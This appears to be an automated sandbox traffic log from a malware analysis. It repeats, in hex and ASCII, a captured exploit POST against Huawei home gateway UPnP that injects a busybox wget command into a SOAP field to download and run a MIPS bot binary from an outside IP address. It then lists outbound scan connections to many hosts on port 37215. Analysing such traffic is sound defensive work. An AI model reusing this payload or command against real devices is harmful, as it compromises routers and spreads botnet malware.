78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.197.24.218:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.69.124.218:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.38.237.230:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.192.209.120:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.124.208.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.32.241.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.126.50.62:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.203.112.174:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.223.111.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.191.193.135:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.248.150.112:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.148.68.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.119.172.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.241.105.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.232.172.126:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.2.114.242:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.33.11.158:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.171.40.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.146.178.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.32.199.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.192.123.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.145.27.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.237.221.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.78.164.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.184.165.241:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.138.22.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.114.166.83:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.150.100.129:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.124.39.223:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.220.216.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.143.81.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.140.110.60:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.10.166.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.105.25.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.188.79.173:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.83.104.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.199.232.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.27.151.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.2.1.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.252.132.243:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.144.126.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.243.129.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.250.79.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.98.71.48:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.113.208.91:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.215.23.196:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.29.168.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.85.246.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.30.15.91:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.35.192.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.177.90.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.144.60.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.137.64.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.46.37.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.115.113.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.205.11.219:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.133.144.46:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 41.92.101.58:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 197.247.49.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:21715 -> 156.162.224.120:37215
